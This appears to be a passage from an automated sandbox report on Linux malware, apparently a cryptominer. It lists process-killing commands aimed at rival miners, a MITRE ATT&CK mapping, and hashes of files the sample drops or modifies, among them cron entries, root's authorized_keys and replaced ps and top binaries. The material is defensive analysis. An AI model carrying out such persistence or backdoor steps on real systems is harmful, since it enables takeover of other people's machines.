  - Reads runtime system information
  PID:1763
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1766
- /usr/bin/pgrep
  pgrep -f kacpi_svc
  2⤵
  PID:1765
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1768
- /usr/bin/pgrep
  pgrep -f kswap_svc
  2⤵
  PID:1767
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1770
- /usr/bin/pgrep
  pgrep -f kauditd_svc
  2⤵
  - Reads runtime system information
  PID:1769
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1772
- /usr/bin/pgrep
  pgrep -f kpsmoused_svc
  2⤵
  - Reads CPU attributes
  PID:1771
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1774
- /usr/bin/pgrep
  pgrep -f kseriod_svc
  2⤵
  PID:1773
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1776
- /usr/bin/pgrep
  pgrep -f kthreadd_svc
  2⤵
  - Reads CPU attributes
  PID:1775
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1778
- /usr/bin/pgrep
  pgrep -f ksoftirqd_svc
  2⤵
  PID:1777
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1780
- /usr/bin/pgrep
  pgrep -f kintegrityd_svc
  2⤵
  PID:1779
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1782
- /usr/bin/pgrep
  pgrep -f jawa
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1781
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1784
- /usr/bin/pgrep
  pgrep -f oracle.jpg
  2⤵
  - Reads CPU attributes
  PID:1783
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1786
- /usr/bin/pgrep
  pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
  2⤵
  PID:1785
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1788
- /usr/bin/pgrep
  pgrep -f 188.209.49.54
  2⤵
  PID:1787
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1790
- /usr/bin/pgrep
  pgrep -f 181.214.87.241
  2⤵
  - Reads runtime system information
  PID:1789
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1792
- /usr/bin/pgrep
  pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
  2⤵
  - Reads runtime system information
  PID:1791
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1794
- /usr/bin/pgrep
  pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
  2⤵
  PID:1793
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1796
- /usr/bin/pgrep
  pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
  2⤵
  PID:1795
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1798
- /usr/bin/pgrep
  pgrep -f servim
  2⤵
  PID:1797
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1800
- /usr/bin/pgrep
  pgrep -f kblockd_svc
  2⤵
  PID:1799
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1802
- /usr/bin/pgrep
  pgrep -f native_svc
  2⤵
  - Reads CPU attributes
  PID:1801
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1804
- /usr/bin/pgrep
  pgrep -f ynn
  2⤵
  PID:1803
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1806
- /usr/bin/pgrep
  pgrep -f 65ccEJ7
  2⤵
  - Reads CPU attributes
  PID:1805
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1808
- /usr/bin/pgrep
  pgrep -f jmxx
  2⤵
  PID:1807
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1810
- /usr/bin/pgrep
  pgrep -f 2Ne80nA
  2⤵
  PID:1809
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1812
- /usr/bin/pgrep
  pgrep -f sysstats
  2⤵
  PID:1811
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1814
- /usr/bin/pgrep
  pgrep -f systemxlv
  2⤵
  PID:1813
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1816
- /usr/bin/pgrep
  pgrep -f watchbog
  2⤵
  PID:1815
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1818
- /usr/bin/pgrep
  pgrep -f OIcJi1m
  2⤵
  PID:1817
- /usr/bin/pkill
  pkill -f biosetjenkins
  2⤵
  PID:1819
- /usr/bin/pkill
  pkill -f Loopback
  2⤵
  PID:1820
- /usr/bin/pkill
  pkill -f apaceha
  2⤵
  - Reads runtime system information
  PID:1821

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:766

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:765

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:788

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:787

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ps

Filesize
13B

MD5
3d47b8e895a71930bda5d4f3d8fc8589

SHA1
efbaf468b81abb6b465ca12f35fa067bae1b4f10

SHA256
be167c52e59f0a02ca6841074d9e73205b2f7898ad73d405c7b96f9efb440c36

SHA512
bd109ac68d85a8451187e31b8ec62dbc062d3fa2aab866928b094b64318912c7056f42ca363b01af74b1898f84d2675f3099d1aab72140b6ba932a16257aa5eb

Download Submit
/bin/ps

Filesize
58B

MD5
751424ef98633f2501ee54aae94d48e9

SHA1
ac1964d06f247604ef910732c7d46446120e12c8

SHA256
3a5fd2c3988dde5fa9d10eae0e43a36962e707e088e63587b1d499c63f6a34ee

SHA512
4567a1691afb5591a30cd066793c9af625e23019fc6e5275fc16eb2b8df464135f278441bf20c9ee76e7c7869fee3a536df9b2eb598b32157bc6397719d6840e

Download Submit
/bin/pstree

Filesize
62B

MD5
6395dcadabdd17b856faba30a87bdc3d

SHA1
0705e49dd037162dbd6e3e6450232143189b7254

SHA256
253db13314002fca3f64b7c78b6362acc3957101f8f07ed0102b034fa3720ddc

SHA512
53d189192d04af8934cdb4138258e4d163dce1e2620d8b4d69a4e89ffb8aa44697489c1eb47492e9068f2f6297df8b3e16609997496be2549ad75ec72e809b4b

Download Submit
/bin/top

Filesize
59B

MD5
41d1529e7394b7047193675b943bcd14

SHA1
4fccac19d22ea9b409fe0a1db5437587e639573b

SHA256
af8701096cf3d13d79b6f0104bcdbfeca94f6de862a19778e3d08af143dd7760

SHA512
94ac31863dd0e34cf8bcde563ec0543438fb7ea79e2e7afade6570262caafdbd1c11ec0c58e239645300745732dff166f069bbada4df5222450a467a42cec08a

Download Submit
/etc/.zshs

Filesize
9B

MD5
970d39f8690eff0fe573e7bcf51bda9b

SHA1
46f8f835d3d3d41f063d0e8346260bb622b01a3f

SHA256
7e3735835710cbbb54a0bee4a323c83c54cb1f4f60463b9cf88006946fe2b9a5

SHA512
24952be3e8e47ffb4ee83d55f513edf041f6c4e420e2f52bdbdf0daee4c5735ad3ee5ed863f95ffa931a70d551590a7fe6ae67dc22f32060793e2525e4b56cd0

Download Submit
/etc/.zshs

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/etc/cron.d/.zsh

Filesize
54B

MD5
d89759367bd4c36736211df1a446605e

SHA1
1bf33c3b8e5f76a987d7e07d33a9d6a00ca89d37

SHA256
c3e8d0a37cd2023eb886720bcbbea156d39bdab142acfc57733ec03879c1e605

SHA512
8ded06355360bcaed5b0eda45ceab0c6dbe6f45e1237ae1cc934a1682ef6b05d451f42837f26ff87f8e067b4107baabfafb1ae66fadd367f9f3c5681c6f3b094

Download Submit
/etc/crontab

Filesize
51B

MD5
b758c1bfe051014e8e556d4880b018b7

SHA1
43a364450f44d7f5257db4dcbd24b02927de3164

SHA256
b2362268f412967bbbb5a204cdd0b3b8ea01b04e24299d7783b444e72f2a8d09

SHA512
080354cb5f9a1f2a85a4b8cc645ec8f762e57a4c7bef5c881aa17e71941b79301dd6d2c86807fb4f936fc69da25840efdfe96195448874809aaea5a72e8e5498

Download Submit
/root/.ssh/authorized_keys

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit
/root/.ssh/authorized_keys

Filesize
396B

MD5
84bdb7cd8a38960268660041fa87b1d2

SHA1
6208fac4c289c12198fbe343865ab0ed88539c28

SHA256
63fc4c85f7d3ea7587b6c51de2c83ce9c58443f67d015fd4a0d97d99d18c9063

SHA512
edbd0818cee9b9ca5a3f9226b778933c0f1dad0be97da4c2c16bb9dcb2a90c863712a3f2ac6ab73b6f43584f66cb70680f50d5c5e845047188cee7274f0e7bb3

Download Submit
/usr/bin/irqbalanced

Filesize
2B

MD5
6d7fce9fee471194aa8b5b6e47267f03

SHA1
a3db5c13ff90a36963278c6a39e4ee3c22e2a436

SHA256
1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2

SHA512
2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80

Download Submit
/usr/bin/kswaped

Filesize
2B

MD5
26ab0db90d72e28ad0ba1e22ee510510

SHA1
7448d8798a4380162d4b56f9b452e2f6f9e24e7a

SHA256
53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3

SHA512
63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7

Download Submit
/usr/bin/pamdicks

Filesize
2B

MD5
9ae0ea9e3c9c6e1b9b6252c8395efdc1

SHA1
ccf271b7830882da1791852baeca1737fcbe4b90

SHA256
06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7

SHA512
f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca

Download Submit
/usr/bin/rctlcli

Filesize
2B

MD5
48a24b70a0b376535542b996af517398

SHA1
9c6b057a2b9d96a4067a749ee3b3b0158d390cf1

SHA256
7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d

SHA512
db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a

Download Submit
/usr/bin/systemd-network

Filesize
2B

MD5
1dcca23355272056f04fe8bf20edfce0

SHA1
5d9474c0309b7ca09a182d888f73b37a8fe1362c

SHA256
f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06

SHA512
29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d

Download Submit
/var/spool/cron/1

Filesize
49B

MD5
c4ea9e23042e89456c883aff0267de34

SHA1
f2574a77bf9dbc2b64d2cb22b70613b53dd723eb

SHA256
58abf2b451b834214cad6d9eb148a242e61963cbe893912f0ae70da038e25bac

SHA512
c5034a5f424df85ab7e446d6cfb0fe29998a4eb59a8e8f553fb321f0db6f5446e04df5be7a6330cf38bff6c89afa2da19d5389e5b5044b168d7c3e3405796e2c

Download Submit